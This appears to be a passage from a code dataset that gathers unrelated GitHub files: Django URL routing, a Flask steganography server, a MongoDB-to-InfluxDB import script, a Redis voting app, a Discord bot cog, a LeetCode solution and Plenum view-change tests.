{result[1]}')","repo_name":"RoraKim/Homework","sub_path":"3_algorithm_hws/0318/1861_정사각형_방/1861_정사각형_방.py","file_name":"1861_정사각형_방.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16425549571","text":"\"\"\"web URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.urls import include, path\r\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.contrib import admin\r\nfrom django.urls import path\r\nfrom django.conf.urls import url, include\r\nfrom django.contrib import admin\r\nfrom myapp import views\r\nfrom myapp.views import ActiveUserView, ResetView\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\n\r\nurlpatterns = [\r\n url(r'^admin/', admin.site.urls),\r\n url(r'^user/',include('myapp.urls')),\r\n url(r'^$', views.index, name='home'),\r\n url(r'^ann/$', views.post_list, name='post_list'),\r\n url(r'^ann/(?P\\d{4})/(?P\\d{2})/(?P\\d{2})/(?P[-\\w]+)/$',\r\n views.post_detail,\r\n name='post_detail'),\r\n url(r'^main_doc/', views.main_doc),\r\n url(r'^bad_doc/', views.bad_doc),\r\n url(r'^pre/', views.pre),\r\n url(r'^reg_status/', views.reg_status),\r\n url(r'^view_teams/', views.view_teams),\r\n url(r'^bad/', views.bad),\r\n url(r'^q_a/', views.q_a),\r\n\turl(r'^traffic/', views.traffic),\r\n url(r'^stay/', views.stay),\r\n\turl(r'^food/', views.food),\r\n url(r'^insurance/', views.insurance),\r\n\turl(r'^donate/', views.donate),\r\n path(r'active//',ActiveUserView.as_view()), # 提取出active后的所有字符赋给active_code\r\n path(r'reset//',ResetView.as_view(),name='reset'),\r\n\r\n]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\r\n\r\nif settings.DEBUG:\r\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_URL)\r\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_URL)\r\n","repo_name":"POABOB/Django--","sub_path":"web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20364325664","text":"from . import Place\n\n\nclass Water(Place):\n \"\"\"Water is a place that can only hold watersafe fighters.\"\"\"\n\n def add_fighter(self, fighter):\n \"\"\"Adding a Fighter to this place. 
If the fighter is not watersafe,\n its armor gonna be reduced to 0.\"\"\"\n super().add_fighter(fighter)\n if not fighter.is_watersafe:\n fighter.reduce_armor(fighter.armor)\n","repo_name":"TanX-357/Dragons-vs-Terminators","sub_path":"places/water.py","file_name":"water.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"45800532492","text":"import numpy as np\n\nimport src.mult as mult\n\n\ndef test_mult_scalar():\n x = np.array(5)\n y = np.array(8)\n out = x * y\n assert mult.mult_scalar(x, y) == out\n\n\ndef test_mult_mat():\n x = np.array([[1, 2], [3, 4]])\n y = np.array([[5, 6], [7, 8]])\n out = x @ y\n assert (mult.mult_mat(x, y) == out).all()\n","repo_name":"ucsdwcsng/pyProjExample","sub_path":"tests/mult_test.py","file_name":"mult_test.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25298014229","text":"from PIL import Image\nimport os\n\n\nrutaActual = os.path.dirname(os.path.abspath(__file__))\n\nfor nombre in os.listdir(rutaActual):\n name, extension = os.path.splitext(rutaActual + nombre)\n if extension in ['.png', '.jpg', '.jpeg']:\n foto = Image.open(rutaActual + '\\\\' + nombre)\n foto = foto.convert('RGB')\n foto.save(rutaActual+'/compresor' + \"compressed_\" + nombre, optimize=True, quality=60)\n print(rutaActual)\n print('Proceso realizado!')","repo_name":"josevillah/Clases_python","sub_path":"compresor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40727316318","text":"from flask import Flask, request, jsonify, send_file\nfrom flask_cors import CORS\nimport os\nimport stepic\nfrom PIL import Image\n\napp = Flask(__name__)\nCORS(app)\n\nUPLOAD_FOLDER = 'uploads'\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nos.makedirs(UPLOAD_FOLDER, exist_ok=True)\n\n@app.route(\"/\")\ndef homePage():\n return jsonify({\"massage\": \"hello world!\"})\n\n@app.route(\"/upload\", methods=[\"POST\"])\ndef upload_file():\n if \"file\" not in request.files:\n return jsonify({\"error\": \"file not upload\"})\n\n file = request.files[\"file\"]\n\n if file.filename == \"\":\n return jsonify({\"error\": \"file is not selected\"})\n\n if file:\n try:\n img = Image.open(file)\n decode = stepic.decode(img)\n decode_data = str(decode)\n\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], \"output.png\"))\n\n return jsonify({\n \"message\": \"This image is already convert in stago...\",\n \"textData\": decode_data,\n \"downloadLink\": \"download_image\",\n \"class\": \"green\"\n })\n except:\n return jsonify({\n \"message\": \"This file is not encoded so pleas first create stago image...\",\n \"textData\": \"\",\n \"downloadLink\": 'error',\n \"class\": \"red\"\n })\n\n\n@app.route(\"/create\", methods=[\"POST\"])\ndef create_file():\n if \"file\" not in request.files:\n return jsonify({\"error\": \"file not upload\"})\n\n file = request.files[\"file\"]\n text = request.form.get(\"textData\")\n\n if file.filename == \"\":\n return jsonify({\"error\": \"file is not selected\"})\n\n if file:\n try:\n img = Image.open(file)\n img_stegano = stepic.encode(img, text.encode())\n\n img_decode = stepic.decode(img_stegano)\n image_decode_data = str(img_decode)\n\n img_stegano.save(os.path.join(\n app.config['UPLOAD_FOLDER'], \"output.png\"))\n\n return jsonify({\n 
\"message\": \"create image successfully...\",\n \"textData\": image_decode_data,\n \"downloadLink\": \"download_image\",\n \"class\": \"green\"\n })\n except:\n return jsonify({\n \"message\": \"This file is not encoded so pleas first create stago image...\",\n \"textData\": \"\",\n \"downloadLink\": 'error',\n \"class\": \"red\"\n })\n\n\n@app.route(\"/download_image\")\ndef download_image():\n img_path = os.path.join(app.config['UPLOAD_FOLDER'], \"output.png\")\n return send_file(img_path, as_attachment=True)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"herinpatel15/server","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74535088730","text":"#!/usr/bin/python\n# -*- coding:utf8 -*-\n\n\"\"\"\nAuthor: Yuanzhaolin\nDate: 2021年2月1日\n\n功能: 读取mysql数据录入mongodb和influxdb\n使用方法:\npython data_import.py [--debug] --mode [nfca|ustb]\n本校区内采用ustb,非矿现场设置为nfca\n\n2021.04.09 周佳城 从mongo读数据到influxdb,according to time(ATT)\n\"\"\"\n\nimport sys, os, pymysql\nimport yaml\nimport getopt\nimport time\nimport datetime\nimport pymongo\nfor _ in range(1, 4):\n sys.path.append('../' * _) # 便于直接在目录下运行该文件\nfrom nfcadb.buffer_to_nfcadb.point_cache import InstrumentPointCache\nfrom nfcadb.buffer_to_nfcadb.database_util import MysqlUtil, write2influx_db\nfrom influxdb_client import InfluxDBClient, WritePrecision\nfrom influxdb_client import Point as InfluxdbPoint\nimport dateutil.parser\n\n\nclass Logger:\n def __init__(self, logger_path, debug):\n \"\"\"\n\n :param logger_path:\n :param level: debug or error\n \"\"\"\n\n self.debug = debug\n self.logger_path = logger_path\n\n def log(self, level, msg):\n if level == 'debug' and not self.debug:\n pass\n else:\n with open(self.logger_path, 'a+') as f:\n f.write('[{}] : {} | {}'.format(str(level).upper(), str(datetime.datetime.now()), msg)+'\\n')\n print('[{}] : {} | {}'.format(str(level).upper(), str(datetime.datetime.now()), msg))\n\n def __call__(self, *args, **kwargs):\n return self.log(*args, **kwargs)\n\n\ndef read_latest_databatch(mysql_config: dict, logger, num_limit: int):\n \"\"\"\n 返回mysql数据,上限为num_limit条。\n mysql连接异常在MysqlUtil中捕获\n :param mysql_config: dict\n :param logger:\n :param num_limit:\n :return:\n \"\"\"\n mysql_util = MysqlUtil(mysql_config, logger)\n if mysql_util.conn is None:\n return None\n # 得到一个可以执行SQL语句的光标对象\n\n cmd = f'select * from gms_monitor limit {num_limit}'\n\n result = mysql_util.handle_command(cmd)\n if result is None:\n logger.log('error', 'Mysql检索失败')\n else:\n logger.log('log', 'Mysql检索成功,共{}条'.format(len(result)))\n mysql_util.close()\n return result\n\n\ndef delete_mysql_data_batch(mysql_config, ids, logger):\n\n mysql_util = MysqlUtil(mysql_config, logger)\n if mysql_util.conn is None:\n return None\n # 得到一个可以执行SQL语句的光标对象\n\n # 执行SQL语句\n # 定义要执���的SQL语句\n\n # 用于删除的SQL,sql命令最长估计不超过1m,mysql限制的最大sql commond长度大约是4m\n cmd = 'DELETE FROM gms_monitor WHERE id IN ({})'.format(\n ','.join(map(str, ids))\n )\n result = mysql_util.handle_command(cmd)\n if result is None:\n logger.log('error', 'Mysql数据删除失败')\n return None\n else:\n logger.log('log', 'Mysql数据删除成功,共{}条'.format(len(ids)))\n mysql_util.close()\n return result\n\n\ndef collect_mongodb_docs(mongodb_config: dict, logger):\n \"\"\"\n 获取'point', 'gms_monitor', 'warning_log', 'gms_now', 'backfill_record'五个doc\n :param mongodb_config:\n :param logger:\n :return:\n \"\"\"\n try:\n client = pymongo.MongoClient(\n 
mongodb_config['uri'],\n username=mongodb_config['username'],\n password=mongodb_config['password']\n )\n logger.log('log', \"连接Mongodb数据库成功\")\n except Exception as e:\n logger.log('error', str(e) + '\\n' + '连接Mongodb数据库失败')\n return None, None\n db = client[\"nfca_db\"]\n\n try:\n docs = tuple(\n [\n db[doc_name] for doc_name in ['point', 'gms_monitor', 'warning_log', 'gms_now', 'backfill_record']\n ]\n )\n except Exception as e:\n logger.log('error', str(e) + '\\n' + '读取Mongodb 文档失败')\n return None, None\n return docs, client\n\n\ndef find_backfill_id(point, monitoring_time, mongodb_backfilling_doc, logger):\n \"\"\"\n\n :param point: 监测数据对应的点位\n :param monitoring_time: 监测数据时间\n :param mongodb_backfilling_doc:\n :param logger:\n :return:\n \"\"\"\n\n if point['thickener_id'] != 0:\n instrument_filter = {'thickener_id': int(point['thickener_id'])}\n else:\n instrument_filter = {'mixer_id': int(point['mixer_id'])}\n\n \"\"\" \n 检索规则解释:\n 加入数据录入服务断线了一段时间,这会导致mysql中的数据不断累积。重启数据录入服务,将当前充填任务的fill_id写入历史数据是不合理的\n 因此检索满足如下条件的充填任务:\n 1. 监测时间夹在充填任务的起止时间之间 或 监测时间在充填任务的起始时间之后且该任务无结束时间\n 2. 满足instrument_filter\n \"\"\"\n backfill_task_filter = dict(\n {\n \"$or\":\n [\n {'start_time': {'$lt': monitoring_time}, 'end_time': {'$gte': monitoring_time}},\n {'start_time': {'$lt': monitoring_time}, 'end_time': None}\n ]\n }, **instrument_filter\n )\n backfilling_belong = mongodb_backfilling_doc.find(\n backfill_task_filter\n ).sort([('start_time', -1)])\n\n if backfilling_belong.count()>1:\n # 理论上不存在两个任务同时满足该检索条件\n logger.log(\n 'warning', 'Backfilling missions {} share {} {}'.format(\n ','.join(str([x['fill_id'] for x in backfilling_belong])),\n 'mixer' if point['thickener_id']!=0 else 'thickener',\n point['mixer_id'] if point['thickener_id']!=0 else point['thickener_id']\n )\n )\n fill_id = -1\n\n # 研究很久没找到怎么取返回结果集里的第一个,用了看起来最蠢的方法\n for backfilling in backfilling_belong:\n fill_id = backfilling['fill_id']\n # 因为检索条件里按照时间逆序,所以只需要取第一个\n break\n return fill_id\n\n\ndef read_yaml(yaml_path='./database_config.yaml', mode='ustb'):\n\n if not os.path.exists(yaml_path):\n raise FileNotFoundError('无法在当前路径找到database_config.yaml')\n f = open(yaml_path, 'r', encoding='utf-8')\n yaml_config = yaml.load(f.read(), Loader=yaml.FullLoader)\n return yaml_config\n\n\ndef main(debug, mode):\n\n logger = Logger('./db_import_log.log', debug)\n logger('debug', 'test')\n yaml_config = read_yaml(mode=mode)\n database_config = yaml_config[mode]\n\n dateStartStr = '2021-04-02T11:40:48Z'\n # dateEndStr= '2021-04-09T06:49:34Z'\n dateStartPar = dateutil.parser.parse(dateStartStr)\n # dateEndPar = dateutil.parser.parse(dateEndStr)\n # 建立连接\n client = pymongo.MongoClient(\n \"mongodb://127.0.0.1:27017/nfca_db\",\n username='nfca',\n password='nfca'\n )\n db = client[\"nfca_db\"]\n # myresult = db.gms_monitor.find({ \"time\" : { \"$gte\" : dateStartPar, \"$lte\" : dateEndPar } })\n myresult = db.gms_monitor.find({ \"time\" : { \"$gte\" : dateStartPar} })\n # 总记录条数\n print(myresult.count())\n influxdb_write_sequence = []\n for monitor in myresult:\n # 构造influxdb数据点并加入列表\n # 存储形式\n # measurement: gms_monitor\n # tag: point, point_id, alarm, fill_id\n # field, Monitoring_value, instrument\n influxdb_write_sequence.append(\n InfluxdbPoint(\n 'gms_monitor'\n ).tag(\n 'point_id', monitor['point_id']\n ).tag(\n 'fill_id', monitor['fill_id']\n ).field(\n 'alarm', monitor['alarm']\n ).field(\n 'Monitoring_value', float(monitor['Monitoring_value'])\n ).time(\n datetime.datetime.strptime(str(monitor['time']), '%Y-%m-%d %H:%M:%S')\n )\n )\n \n\n # 
批量写入influxdb\n write2influx_db(database_config['influxdb'], influxdb_write_sequence, logger)\n\n print('done.')\n\n\nif __name__ == '__main__':\n debug = False\n mode = None\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"\", [\"debug\", \"mode=\"])\n for o, a in opts:\n if o == '--debug':\n debug = True\n elif o == '--mode' and (a == 'nfca' or a == 'ustb'):\n mode = a\n else:\n print('python data_import.py [--debug] --mode [nfca|ustb]')\n raise getopt.GetoptError(msg='Illegal opt or argv')\n if mode is None:\n print('python data_import.py [--debug] --mode [nfca|ustb]')\n raise getopt.GetoptError('Mode missed')\n except getopt.GetoptError as e:\n raise e\n\n main(debug, mode)\n\n\n","repo_name":"jcchouz/MongoDBOpera","sub_path":"mongo_to_influx_ATT.py","file_name":"mongo_to_influx_ATT.py","file_ext":"py","file_size_in_byte":8735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70783073371","text":"from db import create_controls, get_controls, update_controls\nfrom feature_translation.tools import get_dict_key_by_value\nfrom pandas import DataFrame\nimport json\nimport logging\nimport os\n\nlogging.getLogger(__name__)\n\n\ndef get_dataset_schema() -> dict:\n \"\"\"\n Returns the json file containing all information to understand the dataset as a dictionary representation.\n\n :return: dict\n \"\"\"\n current_file = 'translation.py'\n root = os.path.realpath(current_file).split('student-attrition-model')[0]\n path = os.path.join(root, 'student-attrition-model', 'data', 'dataset_legend.json')\n assert os.path.exists(path)\n with open(path, 'rb') as f:\n schema_info = json.load(f)\n return schema_info\n\n\ndef create_translator(df: DataFrame, initialise: bool = False) -> list:\n \"\"\"\n Takes a dataframe containing the original dataset and returns a translation template as a list or returns unknown.\n\n If initialisation is true then the translation and meta-translation lists are added to the control database, if\n initialisation is false then a single translation list is returned.\n\n :param df: DataFrame\n :param initialise: bool\n :return: unknown | list\n \"\"\"\n translation = list()\n meta_translation = list()\n schema = get_dataset_schema()\n features = [list(schema[\"variables\"].keys())[list(schema[\"variables\"].values()).index(feature)] for feature in df]\n for f in features:\n # Features which require one-hot encoding\n if schema['variable_types'].get(f) == 'one_hot_encoded':\n # if schema.get(f) and schema['drop_list'].get(f):\n key = 'parental_occupation_categories' if 'occupation' in f else f\n value_list = list(schema.get(key).values())\n value_list.remove(schema['drop_list'].get(f))\n translation.append(value_list)\n meta_translation.append([f] * len(value_list))\n elif f != \"target\":\n translation.append([f])\n meta_translation.append([f])\n\n if initialise:\n attributes = {\n \"feature_translation\": [item for sublist in translation for item in sublist],\n \"meta_translation\": [item for sublist in meta_translation for item in sublist]\n }\n assert len(attributes[\"feature_translation\"]) == len(attributes[\"meta_translation\"])\n try:\n assert create_controls(attributes) is True\n except Exception as e:\n logging.error(\"could not create controls... 
attempting to update instead\", e)\n try:\n assert update_controls(attributes) is True\n except Exception as e:\n logging.error(\"could not create or update controls\", e)\n raise Exception(e)\n return\n\n return [item for sublist in translation for item in sublist]\n\n\ndef features_hr(features: list) -> dict:\n \"\"\"\n Takes a numeric list of features and returns a dictionary with feature_label: feature_value as key pairs.\n\n Assumes that input (features) is valid and in correct order for translation to dictionary.\n\n :param features: list\n :return: dict of feature label-value pairs\n \"\"\"\n feature_dict = dict()\n schema = get_dataset_schema()\n controls = get_controls()\n translation, meta_translation = controls.feature_translation, controls.meta_translation\n for index, value in enumerate(features):\n category = meta_translation[index]\n if schema[\"variable_types\"].get(category) == 'numeric':\n feature_dict[category] = value\n continue\n if schema[\"variable_types\"].get(category) == 'binary':\n feature_dict[category] = \"Yes\" if value == 1 else \"No\"\n continue\n if schema[\"variable_types\"].get(category) == 'boolean':\n feature_dict[category] = schema[category].get(str(value))\n continue\n if schema[\"variable_types\"].get(category) == 'ordinal' and 'qualification' in category:\n meta_category = f'parental_{category.split(\"_\")[1]}'\n key = get_dict_key_by_value(schema[f\"{meta_category}_labels\"], value)\n feature_dict[category] = schema[f\"{meta_category}_categories\"][key]\n continue\n if schema[\"variable_types\"].get(category) == 'one_hot_encoded':\n # One hot encoded attributes have multiple entries, but only need to be calculated once.\n if feature_dict.get(category):\n continue\n # Find the indexes of all occurrences of the category in the translation array.\n indexes = [i for i, v in enumerate(meta_translation) if v == category]\n decoded = [translation[i] for i in indexes if features[i] != 0]\n feature_dict[category] = decoded[0] if len(decoded) == 1 else schema['drop_list'][category]\n continue\n assert len(set(meta_translation)) == len(feature_dict.keys())\n return feature_dict\n\n\ndef features_n(features: dict) -> list:\n \"\"\"\n Takes a dictionary with feature label-value as key pairs. 
Returns a list of numeric representations of features.\n\n Assumes that input (features) is valid and in correct order for translation to dictionary.\n\n :param features: dict\n :return: list of numeric representations of features\n \"\"\"\n feature_array = list()\n schema = get_dataset_schema()\n controls = get_controls()\n translation, meta_translation = controls.feature_translation, controls.meta_translation\n for index, value in enumerate(translation):\n category = meta_translation[index]\n if schema[\"variable_types\"].get(category) == \"numeric\":\n feature_array.append(features.get(category))\n continue\n if schema[\"variable_types\"].get(category) == 'binary':\n encode = 1 if features.get(category) is True or features.get(category) == \"Yes\" else 0\n feature_array.append(encode)\n continue\n if schema[\"variable_types\"].get(category) == 'boolean':\n encode = int(get_dict_key_by_value(schema[category], features.get(category)))\n feature_array.append(encode)\n continue\n if schema[\"variable_types\"].get(category) == 'ordinal' and 'qualification' in category:\n key = get_dict_key_by_value(schema[\"parental_qualification_categories\"], features.get(category))\n encode = schema[\"parental_qualification_labels\"].get(key)\n feature_array.append(encode)\n continue\n if schema[\"variable_types\"].get(category) == 'one_hot_encoded':\n encode = 1 if value == features.get(category) else 0\n feature_array.append(encode)\n continue\n return feature_array\n\n\ndef features_update(features: list | dict, attribute: str, value: str | int | float | bool, result_type: str = \"list\") -> list | dict:\n \"\"\"\n Takes a list or dictionary representation of the features, updates and returns it in the desired format.\n\n Assumes that all inputs are valid values. Only one feature is altered, all other features remain the same.\n\n :param features: list | dict\n :param attribute: str\n :param value: str | int | float | bool\n :param result_type: str\n :return: list | dict representation of features\n \"\"\"\n feature_dict = features_hr(features) if isinstance(features, list) else features\n feature_dict[attribute] = value\n if result_type == 'dict':\n return feature_dict\n return features_n(feature_dict)\n\n","repo_name":"HappyPhilosoph3r/saip-template","sub_path":"student-attrition-model/feature_translation/translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":7467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19988944147","text":"# pets.py\n\nimport discord\nfrom discord.commands import SlashCommandGroup, Option\nfrom discord.ext import commands\n\nfrom content import pets\nfrom resources import strings\n\n\nclass PetsCog(commands.Cog):\n \"\"\"Cog with pet commands\"\"\"\n def __init__(self, bot):\n self.bot = bot\n\n cmd_pets = SlashCommandGroup(\"pets\", \"Pet guides\")\n\n @cmd_pets.command(name='guide', description='All about pets')\n async def pets_guide(\n self,\n ctx: discord.ApplicationContext,\n topic: Option(str, strings.ARGUMENT_TOPIC_DESCRIPTION,\n choices=pets.TOPICS, default=pets.TOPIC_OVERVIEW),\n ) -> None:\n \"\"\"Professions guides\"\"\"\n await pets.command_pets_guide(ctx, topic)\n\n @cmd_pets.command(name='fuse', description='Pet fusion recommendations for a certain TT.')\n async def pets_fuse(\n self,\n ctx: discord.ApplicationContext,\n pet_tier: Option(int, 'The pet tier you want to see. 
Shows all tiers if empty.', min_value=1, max_value=25,\n default=None),\n timetravel: Option(int, 'The TT you want a recommendation for. Uses your progress setting if empty.',\n min_value=0, max_value=9999, default=None),\n ) -> None:\n \"\"\"Pet fuse recommendations\"\"\"\n await pets.command_pets_fuse(ctx, pet_tier, timetravel)\n\n\n# Initialization\ndef setup(bot):\n bot.add_cog(PetsCog(bot))\n","repo_name":"Miriel-py/Epic-RPG-Guide","sub_path":"cogs/pets.py","file_name":"pets.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"38568351819","text":"class Solution:\n def minCut(self, s: str) -> int:\n def isPalindrome(string):\n return string==string[::-1]\n\n n=len(s)\n dp=[-1]*(n)\n INF = 10**9\n def recur(idx):\n if idx==n:\n return 0\n \n if dp[idx]!=-1:\n return dp[idx]\n \n ans=INF\n for j in range(idx,n):\n if isPalindrome(s[idx:j+1]):\n ans=min(ans,1+recur(j+1))\n \n dp[idx]=ans\n return dp[idx]\n return recur(0)-1","repo_name":"iamheavymetalx7/LeetCode-Submissions","sub_path":"0132-palindrome-partitioning-ii/0132-palindrome-partitioning-ii.py","file_name":"0132-palindrome-partitioning-ii.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"13278370618","text":"from flask import Flask,request, jsonify\nimport redis\nimport os\nimport json\nimport operator\napp = Flask(__name__)\n\n\ncandidates = redis.Redis(\nhost=os.getenv(\"REDIS_HOST\"),\nport=int(os.getenv(\"REDIS_PORT\")),\ncharset=\"utf-8\", decode_responses=True)\n\ncandidates.set(\"candidates\",2)\n\n@app.route('/')\ndef hello_world():\n return 'Hello, World!'\n\n\n@app.route('/check')\ndef check():\n return 'Checking In if everything is fine'\n\n\n@app.route('/vote/')\ndef vote(candidate):\n current_candidate = candidates.get(candidate.upper())\n if current_candidate is not None:\n print(\"founf\")\n candidates.set(candidate.upper(), int(candidates.get(candidate.upper())) + 1 )\n return jsonify(success=True)\n return jsonify(success=False)\n\n@app.route('/register', methods = ['POST'])\ndef register():\n try:\n data =request.get_json()\n candidates.set(data['name'].upper(),0)\n return jsonify(success=True)\n except:\n return jsonify(success=False)\n\n@app.route('/candidates', methods = ['GET'])\ndef get_candidates():\n keys = candidates.keys('*')\n return jsonify(keys)\n\n@app.route('/winner', methods = ['GET'])\ndef get_winner():\n candidates_dict = {}\n keys = candidates.keys('*')\n for key in keys:\n val = candidates.get(key)\n candidates_dict[key] = int(val)\n try:\n print(candidates_dict)\n return jsonify(max(candidates_dict, key=candidates_dict.get))\n \n except:\n return jsonify(success=False)\n\n@app.route('/version', methods = ['GET'])\ndef get_version():\n version = os.getenv(\"VERSION\")\n if version is not None:\n return jsonify(version)\n return jsonify(success=False)\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True, host='0.0.0.0')","repo_name":"sandyjswl/docker-cheat-sheet","sub_path":"vote-app-v3/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35819494625","text":"import pytest\n\nfrom plenum.test.delayers import nv_delay\nfrom plenum.test.stasher import delay_rules\nfrom plenum.test.helper import waitForViewChange, perf_monitor_disabled, 
view_change_timeout\nfrom plenum.test.node_request.helper import sdk_ensure_pool_functional\nfrom plenum.test.node_catchup.helper import ensure_all_nodes_have_same_data\nfrom plenum.test.spy_helpers import get_count, getAllReturnVals\nfrom plenum.test.test_node import get_master_primary_node, \\\n ensureElectionsDone\nfrom stp_core.loop.eventually import eventually\n\nnodeCount = 7\nNEW_VIEW_TIMEOUT = 5\n\n\n@pytest.fixture(scope=\"module\")\ndef tconf(tconf):\n with view_change_timeout(tconf, NEW_VIEW_TIMEOUT), \\\n perf_monitor_disabled(tconf):\n yield tconf\n\n\n# def _check_view_change_completed_stats(nodes):\n# return {node.name: (_check_view_change_completed_count(node), _check_view_change_completed_true(node))\n# for node in nodes}\n\n\n# def check_watchdog_called_expected_times(nodes, stats, times):\n# def call_count(node):\n# return _check_view_change_completed_count(node) - stats[node.name][0]\n#\n# def true_count(node):\n# return _check_view_change_completed_true(node) - stats[node.name][1]\n#\n# n = nodeCount\n# f = (n - 1) // 3\n#\n# call_counts = [call_count(node) for node in nodes]\n# true_counts = [true_count(node) for node in nodes]\n#\n# ok = True\n# ok = ok and all(v <= times for v in call_counts)\n# ok = ok and all(v <= times for v in true_counts)\n# ok = ok and sum(call_counts) >= times * (n - f)\n# ok = ok and sum(true_counts) >= times * (n - f)\n#\n# if not ok:\n# actual = \"\"\n# for node in nodes:\n# actual += \"{}: called {}, returned true {}\\n\".format(node.name, call_count(node), true_count(node))\n# raise AssertionError(\"Watchdog expected to be called {} times, actual counts:\\n{}\".format(times, actual))\n\n\ndef stop_master_primary(nodes, view_no):\n m_next_primary_name = nodes[0].primaries_selector.select_master_primary(view_no)\n next(node for node in nodes if node.name == m_next_primary_name).stop()\n alive_nodes = list(filter(lambda x: x.name != m_next_primary_name, nodes))\n return alive_nodes\n\n\ndef start_view_change(nodes, next_view_no):\n for n in nodes:\n n.view_changer.start_view_change(next_view_no)\n\n\n@pytest.fixture()\ndef setup(txnPoolNodeSet, looper):\n m_primary_node = get_master_primary_node(list(txnPoolNodeSet))\n initial_view_no = waitForViewChange(looper, txnPoolNodeSet)\n timeout_callback_stats = _check_view_change_completed_stats(txnPoolNodeSet)\n return m_primary_node, initial_view_no, timeout_callback_stats\n\n\n@pytest.mark.skip(reason=\"INDY-2244 will be fixed in the scope clean-up work\")\ndef test_view_change_retry_by_timeout(\n txnPoolNodeSet, looper, tconf, setup, sdk_pool_handle, sdk_wallet_client):\n \"\"\"\n Verifies that a view change is restarted if it is not completed in time\n \"\"\"\n m_primary_node, initial_view_no, timeout_callback_stats = setup\n stashers = [n.nodeIbStasher for n in txnPoolNodeSet]\n\n with delay_rules(stashers, nv_delay()):\n start_view_change(txnPoolNodeSet, initial_view_no + 1)\n\n # First view change should fail, because of delayed ViewChangeDone\n # messages. 
This then leads to new view change that we need.\n with pytest.raises(AssertionError):\n ensureElectionsDone(looper=looper,\n nodes=txnPoolNodeSet,\n customTimeout=1.5 * NEW_VIEW_TIMEOUT)\n\n # Now as ViewChangeDone messages are unblocked view changes should finish successfully\n ensureElectionsDone(looper=looper, nodes=txnPoolNodeSet)\n ensure_all_nodes_have_same_data(looper, nodes=txnPoolNodeSet)\n new_m_primary_node = get_master_primary_node(list(txnPoolNodeSet))\n assert m_primary_node.name != new_m_primary_node.name\n\n # The timeout method was called one time\n check_watchdog_called_expected_times(txnPoolNodeSet, timeout_callback_stats, 1)\n\n # 2 view changes have been initiated\n for node in txnPoolNodeSet:\n assert node.viewNo - initial_view_no == 2\n\n sdk_ensure_pool_functional(looper, txnPoolNodeSet,\n sdk_wallet_client,\n sdk_pool_handle)\n\n\n@pytest.mark.skip(reason=\"INDY-2244 will be fixed in the scope clean-up work\")\ndef test_multiple_view_change_retries_by_timeouts(\n txnPoolNodeSet, looper, tconf, setup,\n sdk_pool_handle, sdk_wallet_client):\n \"\"\"\n Verifies that a view change is restarted each time\n when the previous one is timed out\n \"\"\"\n _, initial_view_no, timeout_callback_stats = setup\n stashers = [n.nodeIbStasher for n in txnPoolNodeSet]\n\n with delay_rules(stashers, nv_delay()):\n start_view_change(txnPoolNodeSet, initial_view_no + 1)\n\n # Wait until timeout callback is called 3 times\n looper.run(eventually(check_watchdog_called_expected_times,\n txnPoolNodeSet, timeout_callback_stats, 3,\n retryWait=1,\n timeout=3 * NEW_VIEW_TIMEOUT + 2))\n\n # View changes should fail\n with pytest.raises(AssertionError):\n ensureElectionsDone(looper=looper, nodes=txnPoolNodeSet, customTimeout=1)\n\n # This view change must be completed with no problems\n ensureElectionsDone(looper=looper, nodes=txnPoolNodeSet)\n ensure_all_nodes_have_same_data(looper, nodes=txnPoolNodeSet)\n\n # 4 view changes must have been initiated (initial one + 3 retries)\n for node in txnPoolNodeSet:\n assert node.viewNo - initial_view_no == 4\n\n sdk_ensure_pool_functional(looper, txnPoolNodeSet,\n sdk_wallet_client,\n sdk_pool_handle)\n\n\n@pytest.mark.skip(reason=\"INDY-2244 will be fixed in the scope clean-up work\")\ndef test_view_change_restarted_by_timeout_if_next_primary_disconnected(\n txnPoolNodeSet, looper, tconf, setup):\n \"\"\"\n Verifies that a view change is restarted by timeout\n if the next primary has been disconnected\n \"\"\"\n _, initial_view_no, timeout_callback_stats = setup\n\n 